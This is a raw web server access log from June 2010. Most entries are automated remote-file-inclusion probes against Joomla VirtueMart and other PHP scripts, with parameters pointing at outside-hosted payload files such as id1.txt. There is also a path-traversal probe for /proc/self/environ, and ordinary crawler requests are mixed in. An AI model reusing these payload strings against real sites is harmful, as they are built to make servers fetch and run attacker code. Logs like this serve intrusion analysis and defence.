74.124.198.60 - - [07/Jun/2010:16:54:41 -0700] "GET /logs/access_100412.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:54:46 -0700] "GET /logs/access_100222.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:54:49 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:54:49 -0700] "GET /logs/access_100125.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.79.245.1 - - [07/Jun/2010:16:54:51 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kucharze.info/getok/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.79.245.1 - - [07/Jun/2010:16:54:51 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kucharze.info/getok/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.79.245.1 - - [07/Jun/2010:16:54:51 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kucharze.info/getok/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.79.245.1 - - [07/Jun/2010:16:54:52 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kucharze.info/getok/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.79.245.1 - - [07/Jun/2010:16:54:52 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kucharze.info/getok/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.79.245.1 - - [07/Jun/2010:16:54:52 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kucharze.info/getok/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.124.198.60 - - [07/Jun/2010:16:54:52 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.124.198.60 - - [07/Jun/2010:16:54:52 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.124.198.60 - - [07/Jun/2010:16:54:54 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.124.198.60 - - [07/Jun/2010:16:55:04 -0700] "GET /logs/access_100412.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:55:09 -0700] "GET /logs/access_100412.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:55:14 -0700] "GET /logs/access_100208.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:55:37 -0700] "GET /logs/access_100201.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:55:44 -0700] "GET /logs/access_100201.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:16:55:55 -0700] "GET /logs/access_100201.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
184.73.59.247 - - [07/Jun/2010:16:56:31 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )" "freehairsecrets.com"
184.73.59.247 - - [07/Jun/2010:16:56:32 -0700] "GET /freehairsecretsphp/viewtopic.php?p=4365 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )" "freehairsecrets.com"
77.79.245.1 - - [07/Jun/2010:16:56:47 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kucharze.info/getok/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.79.245.1 - - [07/Jun/2010:16:56:47 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kucharze.info/getok/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.79.245.1 - - [07/Jun/2010:16:56:47 -0700] "GET /logs/access.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kucharze.info/getok/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.79.245.1 - - [07/Jun/2010:16:56:48 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kucharze.info/getok/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.79.245.1 - - [07/Jun/2010:16:56:48 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kucharze.info/getok/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.79.245.1 - - [07/Jun/2010:16:56:48 -0700] "GET /logs/access.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kucharze.info/getok/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
59.42.10.71 - - [07/Jun/2010:16:56:56 -0700] "GET /login.php?dir=http://arab-job.com/api/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
59.42.10.71 - - [07/Jun/2010:16:56:56 -0700] "GET /logs//login.php?dir=http://arab-job.com/api/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
59.42.10.71 - - [07/Jun/2010:16:56:56 -0700] "GET /logs/access.log%20%20//login.php?dir=http://arab-job.com/api/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
72.37.150.18 - - [07/Jun/2010:16:57:05 -0700] "GET /logs/access_100301.log//delete_comment.php?board_skin_path=http://ecohearth.com/tmp/id.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
59.42.10.71 - - [07/Jun/2010:16:57:36 -0700] "GET /login.php?dir=http://arab-job.com/api/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
208.115.111.248 - - [07/Jun/2010:16:57:44 -0700] "GET /logs/access_091026.log HTTP/1.1" 200 562644 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [07/Jun/2010:16:57:46 -0700] "GET /logs/access_091102.log HTTP/1.1" 200 696678 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [07/Jun/2010:16:57:47 -0700] "GET /logs/access_091109.log HTTP/1.1" 200 589584 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [07/Jun/2010:16:57:49 -0700] "GET /logs/access_091116.log HTTP/1.1" 200 718477 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [07/Jun/2010:16:57:52 -0700] "GET /logs/access_091123.log HTTP/1.1" 200 1294739 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
59.42.10.71 - - [07/Jun/2010:16:57:52 -0700] "GET /login.php?dir=http://arab-job.com/api/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
59.42.10.71 - - [07/Jun/2010:16:57:52 -0700] "GET /logs/access_100412.log//login.php?dir=http://arab-job.com/api/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
59.42.10.71 - - [07/Jun/2010:16:57:52 -0700] "GET /logs//login.php?dir=http://arab-job.com/api/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.115.111.248 - - [07/Jun/2010:16:57:53 -0700] "GET /logs/access_091130.log HTTP/1.1" 200 674055 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [07/Jun/2010:16:57:55 -0700] "GET /logs/access_091207.log HTTP/1.1" 200 748461 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [07/Jun/2010:16:57:57 -0700] "GET /logs/access_091214.log HTTP/1.1" 200 793223 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [07/Jun/2010:16:57:59 -0700] "GET /logs/access_091221.log HTTP/1.1" 200 760051 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [07/Jun/2010:16:58:01 -0700] "GET /logs/access_091228.log HTTP/1.1" 200 636872 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
59.42.10.71 - - [07/Jun/2010:16:58:30 -0700] "GET /login.php?dir=http://arab-job.com/api/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
59.42.10.71 - - [07/Jun/2010:16:58:30 -0700] "GET /logs//login.php?dir=http://arab-job.com/api/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
59.42.10.71 - - [07/Jun/2010:16:58:30 -0700] "GET /logs/access_100412.log%20%20//login.php?dir=http://arab-job.com/api/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [07/Jun/2010:16:59:32 -0700] "GET /freehairsecretsphp/viewtopic.php?p=5015 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
81.208.34.38 - - [07/Jun/2010:17:03:16 -0700] "GET /skin/zero_vote/error.php?dir=http://snsecrets.com/css/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
81.208.34.38 - - [07/Jun/2010:17:03:16 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://snsecrets.com/css/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
81.208.34.38 - - [07/Jun/2010:17:03:16 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://snsecrets.com/css/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
81.208.34.38 - - [07/Jun/2010:17:03:18 -0700] "GET /logs/access_100111.log%20%20//skin/zero_vote/error.php?dir=http://phamsight.com/docs/images/head???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.208.34.38 - - [07/Jun/2010:17:03:18 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://phamsight.com/docs/images/head???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.208.34.38 - - [07/Jun/2010:17:03:18 -0700] "GET /skin/zero_vote/error.php?dir=http://phamsight.com/docs/images/head???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:17:06:18 -0700] "GET /logs/access_100405.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:17:06:18 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:17:06:18 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:17:06:21 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:17:06:21 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:17:06:21 -0700] "GET /logs/access_100405.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:17:06:33 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:17:06:33 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:17:06:33 -0700] "GET /logs/access_100405.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:17:06:36 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:17:06:36 -0700] "GET /logs/access_100405.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:17:06:36 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:17:06:48 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:17:06:48 -0700] "GET /logs/access_100329.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:17:06:48 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:17:07:07 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:17:07:07 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:17:07:07 -0700] "GET /logs/access_100329.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:17:07:10 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:17:07:10 -0700] "GET /logs/access_100329.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:17:07:10 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:17:07:10 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:17:07:10 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:17:07:10 -0700] "GET /logs/access_100329.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:17:08:18 -0700] "GET /logs/access_100405.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:17:08:47 -0700] "GET /logs/access_100405.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:17:08:57 -0700] "GET /logs/access_100405.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [07/Jun/2010:17:09:02 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13440 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:17:09:07 -0700] "GET /logs/access_100405.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:17:12:15 -0700] "GET /logs/access_100111.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:17:12:26 -0700] "GET /logs/access_100111.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:17:12:31 -0700] "GET /logs/access_100111.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:17:13:06 -0700] "GET /logs/access_100111.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.121.208.42 - - [07/Jun/2010:17:15:41 -0700] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.208.42 - - [07/Jun/2010:17:19:49 -0700] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
77.88.25.28 - - [07/Jun/2010:17:20:19 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14937 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
74.124.198.60 - - [07/Jun/2010:17:22:29 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:17:22:29 -0700] "GET /logs/access_100308.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:17:22:29 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:17:22:30 -0700] "GET /logs/access_100308.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:17:22:30 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:17:22:30 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:17:22:31 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:17:22:31 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:17:22:31 -0700] "GET /logs/access_100308.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.208.34.38 - - [07/Jun/2010:17:24:25 -0700] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://phamsight.com/docs/images/head???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.88.25.28 - - [07/Jun/2010:17:27:18 -0700] "GET /freehairsecretsphp/viewtopic.php?p=6719 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:17:27:31 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:17:27:31 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:17:27:31 -0700] "GET /logs/access_100308.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:17:29:12 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:17:29:12 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [07/Jun/2010:17:29:12 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://lrc.org.ly/tmp/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
